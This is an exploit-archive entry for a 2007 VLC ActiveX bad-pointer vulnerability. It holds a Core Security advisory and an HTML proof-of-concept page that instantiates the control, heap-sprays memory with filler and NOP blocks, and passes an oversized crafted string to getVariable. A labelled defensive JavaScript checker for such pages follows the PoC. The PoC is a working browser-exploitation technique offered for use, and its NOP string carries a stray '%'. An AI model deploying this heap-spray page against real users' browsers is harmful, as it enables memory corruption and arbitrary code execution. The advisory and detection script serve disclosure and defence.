VLC 0.86 < 0.86d ActiveX Remote Bad Pointer Initialization PoC
2007-12-04T00:00:00
ID 1337DAY-ID-6472 Type zdt Reporter Ricardo Narvaja Modified 2007-12-04T00:00:00
Description
Exploit for unknown platform in category dos / poc
==============================================================
VLC 0.86 < 0.86d ActiveX Remote Bad Pointer Initialization PoC
==============================================================
<!--
Core Security Technologies - CoreLabs Advisory
http://www.coresecurity.com/corelabs
VLC Activex Bad Pointer Initialization Vulnerability
*Advisory Information*
Title: VLC Activex Bad Pointer Initialization Vulnerability
Advisory ID: CORE-2007-1004
Advisory URL: http://www.coresecurity.com/?action=item&id=2035
Date published: 2007-12-04
Date of last update: 2007-12-03
Vendors contacted: VLC
Release mode: Coordinated Release
*Vulnerability Description*
VLC player is a popular multimedia player for various audio and video
formats, and various streaming protocols.
A vulnerability has been found in the ActiveX control DLL (axvlc.dll)
used by VLC player. This library contains three methods whose parameters
are not correctly checked, and may produce a badly initialized pointer. By
providing these functions specially crafted parameters, an attacker can
overwrite memory zones and execute arbitrary code.
*Vulnerable packages*
VLC media player versions 0.86, 0.86a, 0.86b and 0.86c.
-->
<html>
<head>
<object classid='clsid:E23FE9C6-778E-49D4-B537-38FCDE4887D8'
id='target' ></object>
</head>
<body>
<script>
  var mm = null;

  if( target != null )
  {
    var param1 = unescape("%u0505%u0505");
    var salame = "defaultV";
    var salame2 = 1;
    var salame3 = 0;

    ag = unescape("%uCCCC%uCCCC");
    sh = unescape("%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%");
    sz = sh.length * 2;
    npsz = 0x400000 - (sz + 0x38);
    nps = unescape("%u0505%u0505");

    while(nps.length * 2 < npsz) nps += nps;
    ihbc = (0x0E000000 - 0x400000) / 0x400000;
    mm = new Array();

    for(i = 0; i <= ihbc; i++) mm[i] = nps + sh;

    for(var i=0;i<2000;i++)
      param1 = param1 + unescape("%u0505%u0505");

    target.getVariable (param1);
  }
</script>
</body>
</html>
# 0day.today [2018-04-09] #
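
A defender-side check for the pattern in the PoC above, as an added example that is not part of the original advisory or PoC: it flags HTML that instantiates the control by the CLSID shown on this page, lists the methods scripted on it, and notes filler-string construction. The function names, rule names and sample pages are assumptions made for this example.

```javascript
// Added example: static triage of HTML that scripts the VLC ActiveX control.
const VLC_AX_CLSID = "E23FE9C6-778E-49D4-B537-38FCDE4887D8"; // CLSID from the PoC

// Return the id of every <object> that instantiates the control (null if none).
function findControlIds(html) {
  const ids = [];
  for (const [tag] of html.matchAll(/<object\b[^>]*>/gi)) {
    const cls = /classid\s*=\s*['"]?\s*clsid:([0-9a-f-]{36})/i.exec(tag);
    if (!cls || cls[1].toUpperCase() !== VLC_AX_CLSID) continue;
    const id = /\bid\s*=\s*['"]?(\w+)/i.exec(tag);
    ids.push(id ? id[1] : null);
  }
  return ids;
}

// Heuristic rules chosen for this example; they are not vendor signatures.
function triage(html) {
  const ids = findControlIds(html);
  if (ids.length === 0) return [];
  const hits = ["control-instantiated"];
  const js = [...html.matchAll(/<script\b[^>]*>([\s\S]*?)<\/script>/gi)]
    .map((m) => m[1]).join("\n");
  for (const id of ids.filter(Boolean)) {
    const call = new RegExp("\\b" + id + "\\s*\\.\\s*(\\w+)\\s*\\(", "g");
    for (const m of js.matchAll(call)) hits.push("method-call:" + m[1]);
  }
  // Filler made of one repeated %uXXXX value, as in unescape("%u0505%u0505").
  if (/(%u[0-9a-f]{4})\1+/i.test(js)) hits.push("repeated-unicode-escape");
  // A string appended to itself in a loop doubles on every iteration.
  if (/\b(?:while|for)\s*\([^)]*\)\s*\{?\s*(\w+)\s*\+=\s*\1\b/.test(js))
    hits.push("self-doubling-string");
  return hits;
}

// Constructed sample pages (not captured traffic).
const OBJ = "<object classid='clsid:" + VLC_AX_CLSID + "' id='vlc'></object>";
const SUSPECT = OBJ + "<script>var s = unescape('%u0505%u0505');" +
  "while (s.length < 4096) s += s; vlc.getVariable(s);</script>";
const BENIGN = OBJ + "<script>vlc.play();</script>";

console.log(triage(SUSPECT));
console.log(triage(BENIGN));
```

A page that only embeds the control and calls a playback method yields the first two rule types; the filler and doubling rules are what separate the PoC's shape from ordinary use.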